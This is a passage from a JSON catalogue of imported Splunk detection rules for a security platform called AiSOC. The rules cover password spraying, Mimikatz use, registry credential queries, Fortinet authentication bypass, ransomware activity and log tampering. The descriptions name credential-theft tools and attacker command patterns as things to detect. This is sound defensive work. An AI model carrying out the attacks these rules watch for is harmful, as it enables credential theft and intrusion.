Test and customize this detections thresholds as needed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-password-spray-attack-behavior-on-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a7539705-7183-4a12-9b6a-b6eef645a6d7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_password_spray_attack_behavior_on_user.yml" } }, { "id": "splunk-security-content-a79b607a-50cc-4704-bb9d-eff280cb78c2", "type": "detection", "name": "ASL AWS Credential Access GetPasswordData", "description": "The following analytic identifiesGetPasswordData API calls in your AWS account. It leverages CloudTrail logs from Amazon Security Lake to detect this activity by counting the distinct instance IDs accessed. This behavior is significant as it may indicate an attempt to retrieve encrypted administrator passwords for running Windows instances, which is a critical security concern. 
If confirmed malicious, attackers could gain unauthorized access to administrative credentials, potentially leading to full control over the affected instances and further compromise of the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.001", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-credential-access-getpassworddata.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a79b607a-50cc-4704-bb9d-eff280cb78c2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_credential_access_getpassworddata.yml" } }, { "id": "splunk-security-content-a7a7afdb-3c58-45b6-9bff-63e5acfd9d40", "type": "detection", "name": "Windows Modify Registry Default Icon Setting", "description": "The following analytic detects suspicious modifications to the Windows registry's default icon settings, a technique associated with Lockbit ransomware. It leverages data from the Endpoint Registry data model, focusing on changes to registry paths under \"*HKCR\\\\*\\\\defaultIcon\\\\(Default)*\". This activity is significant as it is uncommon for normal users to modify these settings, and such changes can indicate ransomware infection or other malware. 
If confirmed malicious, this could lead to system defacement and signal a broader ransomware attack, potentially compromising sensitive data and system integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-default-icon-setting.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a7a7afdb-3c58-45b6-9bff-63e5acfd9d40", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_default_icon_setting.yml" } }, { "id": "splunk-security-content-a7da845d-6fae-41cf-b823-6c0b8c55814a", "type": "detection", "name": "Azure AD Privileged Authentication Administrator Role Assigned", "description": "The following analytic detects the assignment of the Privileged Authentication Administrator role to an Azure AD user. It leverages Azure Active Directory audit logs to identify when this specific role is assigned. This activity is significant because users in this role can set or reset authentication methods for any user, including those in privileged roles like Global Administrators. 
If confirmed malicious, an attacker could change credentials and assume the identity and permissions of high-privilege users, potentially leading to unauthorized access to sensitive information and critical configurations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-privileged-authentication-administrator-role-assigned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a7da845d-6fae-41cf-b823-6c0b8c55814a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_privileged_authentication_administrator_role_assigned.yml" } }, { "id": "splunk-security-content-a7e3f0f0-ae42-11eb-b245-acde48001122", "type": "detection", "name": "Executables Or Script Creation In Suspicious Path", "description": "The following analytic identifies the creation of executables or scripts in suspicious file paths on Windows systems. It leverages the Endpoint.Filesystem dataset to detect files with specific extensions (e.g., .exe, .dll, .ps1) created in uncommon directories (e.g., \\windows\\fonts\\, \\users\\public\\). This activity can be significant as adversaries often use these paths to evade detection and maintain persistence. 
If confirmed malicious, this behavior could allow attackers to execute unauthorized code, escalate privileges, or persist within the environment, posing a significant security threat.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/executables-or-script-creation-in-suspicious-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a7e3f0f0-ae42-11eb-b245-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/executables_or_script_creation_in_suspicious_path.yml" } }, { "id": "splunk-security-content-a7f2e891-3c4d-4a1b-9e6f-2b8d0c5a1f3e", "type": "detection", "name": "MacOS Log Removal", "description": "Detects the deletion or modification of logs on MacOS systems by identifying execution of the rm command with command-line arguments referencing system.log or audit-related paths.\nAdversaries may remove or alter log files to cover their tracks and hinder detection and forensic analysis. 
This behavior commonly occurs during post-exploitation cleanup.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_migrated", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_migrated/macos-log-removal.yaml", "provenance": { "source": "splunk/security_content", "source_id": "a7f2e891-3c4d-4a1b-9e6f-2b8d0c5a1f3e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/macos_log_removal.yml" } }, { "id": "splunk-security-content-a7fbbc4e-4571-424a-b627-6968e1c939e4", "type": "detection", "name": "Windows Domain Account Discovery Via Get-NetComputer", "description": "The following analytic detects the execution of the PowerView PowerShell cmdlet Get-NetComputer, which is used to query Active Directory for user account details such as \"samaccountname,\" \"accountexpires,\" \"lastlogon,\" and more. It leverages Event ID 4104 from PowerShell Script Block Logging to identify this activity. This behavior is significant as it may indicate an attempt to gather user account information, which is often a precursor to further malicious actions. 
If confirmed malicious, this activity could lead to unauthorized access, privilege escalation, or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-domain-account-discovery-via-get-netcomputer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a7fbbc4e-4571-424a-b627-6968e1c939e4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_domain_account_discovery_via_get_netcomputer.yml" } }, { "id": "splunk-security-content-a83122f2-fa09-4868-a230-544dbc54bc1c", "type": "detection", "name": "Fortinet Appliance Auth bypass", "description": "The following analytic detects attempts to exploit CVE-2022-40684, a Fortinet appliance authentication bypass vulnerability.\nIt identifies REST API requests to the /api/v2/ endpoint using various HTTP methods (GET, POST, PUT, DELETE) that may indicate unauthorized modifications, such as adding SSH keys or creating new users.\nThis detection leverages the Web datamodel to monitor specific URL patterns and HTTP methods.\nThis activity is significant as it can lead to unauthorized access and control over the appliance.\nIf confirmed malicious, attackers could gain persistent access, reroute network traffic, or capture sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": 
null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/fortinet-appliance-auth-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a83122f2-fa09-4868-a230-544dbc54bc1c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/fortinet_appliance_auth_bypass.yml" } }, { "id": "splunk-security-content-a85aa37e-9647-11ec-90c5-acde48001122", "type": "detection", "name": "Windows Raw Access To Disk Volume Partition", "description": "The following analytic detects suspicious raw access reads to the device disk partition of a host machine. It leverages Sysmon EventCode 9 logs to identify processes attempting to read or write to the boot sector, excluding legitimate system processes. This activity is significant as it is commonly associated with destructive actions by adversaries, such as wiping, encrypting, or overwriting the boot sector, as seen in attacks involving malware like HermeticWiper. 
If confirmed malicious, this behavior could lead to severe impacts, including system inoperability, data loss, or compromised boot integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1561.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-raw-access-to-disk-volume-partition.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a85aa37e-9647-11ec-90c5-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_raw_access_to_disk_volume_partition.yml" } }, { "id": "splunk-security-content-a87736a6-95cd-4728-8689-3c64d5026b3e", "type": "detection", "name": "Domain Group Discovery With Wmic", "description": "The following analytic identifies the execution of `wmic.exe` with command-line arguments used to query for domain groups. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as it indicates potential reconnaissance efforts by adversaries to gain situational awareness and map out Active Directory structures. 
If confirmed malicious, this behavior could allow attackers to identify and target specific domain groups, potentially leading to privilege escalation or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/domain-group-discovery-with-wmic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a87736a6-95cd-4728-8689-3c64d5026b3e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/domain_group_discovery_with_wmic.yml" } }, { "id": "splunk-security-content-a87cd633-076d-4ab2-9047-977751a3c1a0", "type": "detection", "name": "Azure AD New Federated Domain Added", "description": "The following analytic detects the addition of a new federated domain within an Azure Active Directory tenant. It leverages Azure AD AuditLogs to identify successful \"Set domain authentication\" operations. This activity is significant as it may indicate the use of the Azure AD identity federation backdoor technique, allowing an adversary to establish persistence. 
If confirmed malicious, the attacker could impersonate any user, bypassing password and MFA requirements, potentially leading to unauthorized access and control over the Azure AD environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-new-federated-domain-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a87cd633-076d-4ab2-9047-977751a3c1a0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_new_federated_domain_added.yml" } }, { "id": "splunk-security-content-a8b3124e-2278-4b73-ae9c-585117079fb2", "type": "detection", "name": "Windows Credentials in Registry Reg Query", "description": "The following analytic identifies processes querying the registry for potential passwords or credentials. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions that access specific registry paths known to store sensitive information. This activity is significant as it may indicate credential theft attempts, often used by adversaries or post-exploitation tools like winPEAS. 
If confirmed malicious, this behavior could lead to privilege escalation, persistence, or lateral movement within the network, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-credentials-in-registry-reg-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a8b3124e-2278-4b73-ae9c-585117079fb2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_credentials_in_registry_reg_query.yml" } }, { "id": "splunk-security-content-a9079b18-1633-11ec-859c-acde48001122", "type": "detection", "name": "Check Elevated CMD using whoami", "description": "The following analytic identifies the execution of the \"whoami\" command with the \"/group\" flag, where the results are passed to the \"find\" command in order to look for the string \"12288\". This string represents the SID of the group \"Mandatory Label\\High Mandatory Level\", effectively checking whether the current process is running as a \"High\" integrity process or with Administrator privileges. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and command-line telemetry. This activity is significant because it is commonly used by attackers, such as FIN7, to perform reconnaissance on a compromised host. 
If confirmed malicious, this behavior could indicate an attacker is assessing their privilege level, potentially leading to further privilege escalation or persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/check-elevated-cmd-using-whoami.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a9079b18-1633-11ec-859c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/check_elevated_cmd_using_whoami.yml" } }, { "id": "splunk-security-content-a9126f73-9a9b-493d-96ec-0dd06695490d", "type": "detection", "name": "Azure AD Concurrent Sessions From Different Ips", "description": "The following analytic detects an Azure AD account with concurrent sessions originating from multiple unique IP addresses within a 5-minute window. It leverages Azure Active Directory NonInteractiveUserSignInLogs to identify this behavior by analyzing successful authentication events and counting distinct source IPs. This activity is significant as it may indicate session hijacking, where an attacker uses stolen session cookies to access corporate resources from a different location. 
If confirmed malicious, this could lead to unauthorized access to sensitive information and potential data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1185" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-concurrent-sessions-from-different-ips.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a9126f73-9a9b-493d-96ec-0dd06695490d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_concurrent_sessions_from_different_ips.yml" } }, { "id": "splunk-security-content-a913718a-25b6-11ec-96d3-acde48001122", "type": "detection", "name": "Rundll32 Shimcache Flush", "description": "The following analytic detects the execution of a suspicious rundll32 command line used to clear the shim cache. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs and command-line arguments. This activity is significant because clearing the shim cache is an anti-forensic technique aimed at evading detection and removing forensic artifacts. 
If confirmed malicious, this action could hinder incident response efforts, allowing an attacker to cover their tracks and maintain persistence on the compromised machine.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/rundll32-shimcache-flush.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a913718a-25b6-11ec-96d3-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/rundll32_shimcache_flush.yml" } }, { "id": "splunk-security-content-a93df51e-e612-40b7-a105-33e288160575", "type": "detection", "name": "Windows Routing and Remote Access Service Registry Key Change", "description": "This analytic identifies the modification of the Windows RemoteAccess Registry Entry.\nThis technique can be used by malware, adversaries, threat actors and red teamers to gain persistence on a system by tampering with the key to add a custom DLL to be loaded.\nThis technique was also observed to be used by Gh0st RAT malware.\nUpon seeing this behavior, it is recommended to review the system services events especially the remote access services.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": 
"detections/splunk-imports/_quarantine/windows-routing-and-remote-access-service-registry-key-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a93df51e-e612-40b7-a105-33e288160575", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_routing_and_remote_access_service_registry_key_change.yml" } }, { "id": "splunk-security-content-a9a1da02-8e27-4bf7-a348-f4389c9da487", "type": "detection", "name": "GetAdComputer with PowerShell Script Block", "description": "The following analytic detects the execution of the `Get-AdComputer` PowerShell commandlet using PowerShell Script Block Logging (EventCode=4104). This detection leverages script block text to identify when this commandlet is run. The `Get-AdComputer` commandlet is significant as it can be used by adversaries to enumerate all domain computers, aiding in situational awareness and Active Directory discovery. 
If confirmed malicious, this activity could allow attackers to map the network, identify targets, and plan further attacks, potentially leading to unauthorized access and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getadcomputer-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a9a1da02-8e27-4bf7-a348-f4389c9da487", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getadcomputer_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-a9e0d6d3-9676-4e26-994d-4e0406bb4467", "type": "detection", "name": "Windows Mimikatz Binary Execution", "description": "The following analytic identifies the execution of the native mimikatz.exe binary on Windows systems, including instances where the binary is renamed. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and original file names. This activity is significant because Mimikatz is a widely used tool for extracting authentication credentials, posing a severe security risk. 
If confirmed malicious, this activity could allow attackers to obtain sensitive credentials, escalate privileges, and move laterally within the network, leading to potential data breaches and system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-mimikatz-binary-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a9e0d6d3-9676-4e26-994d-4e0406bb4467", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_mimikatz_binary_execution.yml" } }, { "id": "splunk-security-content-a9e5c5db-db11-43ca-86a8-c852d1b2c0ec", "type": "detection", "name": "Common Ransomware Extensions", "description": "The following analytic detects modifications to files with extensions commonly associated with ransomware. It leverages the Endpoint.Filesystem data model to identify changes in file extensions that match known ransomware patterns. This activity is significant because it suggests an attacker is attempting to encrypt or alter files, potentially leading to severe data loss and operational disruption. 
If confirmed malicious, this activity could result in the encryption of critical data, rendering it inaccessible and causing significant damage to the organization's data integrity and availability.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/common-ransomware-extensions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a9e5c5db-db11-43ca-86a8-c852d1b2c0ec", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/common_ransomware_extensions.yml" } }, { "id": "splunk-security-content-aa049566-f76a-43b9-908c-3c27e079fd43", "type": "detection", "name": "Linux Docker Root Directory Mount", "description": "This detection identifies Docker containers that mount the host's root directory into the container filesystem.\nMounting the entire host root directory into a container effectively grants the container visibility and potential write access to all files on the host system.\nIf the container is running as root or with elevated capabilities (e.g., --privileged), the risk is significantly increased.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1611" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-docker-root-directory-mount.yaml", "quarantine_reason": "imported rule; 
upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "aa049566-f76a-43b9-908c-3c27e079fd43", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_docker_root_directory_mount.yml" } }, { "id": "splunk-security-content-aa0c4aeb-5b18-41c4-8c07-f1442d7599df", "type": "detection", "name": "Child Processes of Spoolsv exe", "description": "The following analytic identifies child processes spawned by spoolsv.exe, the Print Spooler service in Windows, which typically runs with SYSTEM privileges. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and parent process relationships. Monitoring this activity is crucial as it can indicate exploitation attempts, such as those associated with CVE-2018-8440, which can lead to privilege escalation. 
If confirmed malicious, attackers could gain SYSTEM-level access, allowing them to execute arbitrary code, escalate privileges, and potentially compromise the entire system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/child-processes-of-spoolsv-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "aa0c4aeb-5b18-41c4-8c07-f1442d7599df", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/child_processes_of_spoolsv_exe.yml" } }, { "id": "splunk-security-content-aa1748dd-4a5c-457a-9cf6-ca7b4eb711b3", "type": "detection", "name": "Linux SSH Remote Services Script Execute", "description": "The following analytic detects the use of SSH to move laterally and execute a script or file on a remote host. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific SSH command-line parameters and URLs. This activity is significant as it may indicate an attacker attempting to execute remote commands or scripts, potentially leading to unauthorized access or control over additional systems. 
If confirmed malicious, this could result in lateral movement, privilege escalation, or the execution of malicious payloads, compromising the security of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-ssh-remote-services-script-execute.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "aa1748dd-4a5c-457a-9cf6-ca7b4eb711b3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_ssh_remote_services_script_execute.yml" } }, { "id": "splunk-security-content-aa19e627-d448-4a31-85cd-82068dec5691", "type": "detection", "name": "Zscaler Virus Download threat blocked", "description": "The following analytic identifies attempts to download viruses that were blocked by Zscaler within a network. It leverages web proxy logs to detect blocked actions indicative of virus download attempts. Key data points such as device owner, user, URL category, destination URL, and IP are analyzed. This activity is significant as it helps in early detection and remediation of potential virus threats, enhancing network security. 
If confirmed malicious, this activity could indicate an attempt to compromise the network, potentially leading to data breaches or further malware infections.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/zscaler-virus-download-threat-blocked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "aa19e627-d448-4a31-85cd-82068dec5691", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/zscaler_virus_download_threat_blocked.yml" } }, { "id": "splunk-security-content-aa4f695a-3024-11ec-9987-acde48001122", "type": "detection", "name": "Disable Defender AntiVirus Registry", "description": "The following analytic detects the modification of Windows Defender registry settings to disable antivirus and antispyware protections. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to registry paths associated with Windows Defender policies. This activity is significant because disabling antivirus protections is a common tactic used by adversaries to evade detection and maintain persistence on compromised systems. 
If confirmed malicious, this action could allow attackers to execute further malicious activities undetected, leading to potential data breaches, system compromise, and further propagation of malware within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disable-defender-antivirus-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "aa4f695a-3024-11ec-9987-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disable_defender_antivirus_registry.yml" } }, { "id": "splunk-security-content-aa73f80d-d728-4077-b226-81ea0c8be589", "type": "detection", "name": "Script Execution via WMI", "description": "The following analytic detects the execution of scripts via Windows Management Instrumentation (WMI) by monitoring the process 'scrcons.exe'. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events. WMI-based script execution is significant because adversaries often use it to perform malicious activities stealthily, such as system compromise, data exfiltration, or establishing persistence. If confirmed malicious, this activity could allow attackers to execute arbitrary code, escalate privileges, or maintain long-term access to the environment. 
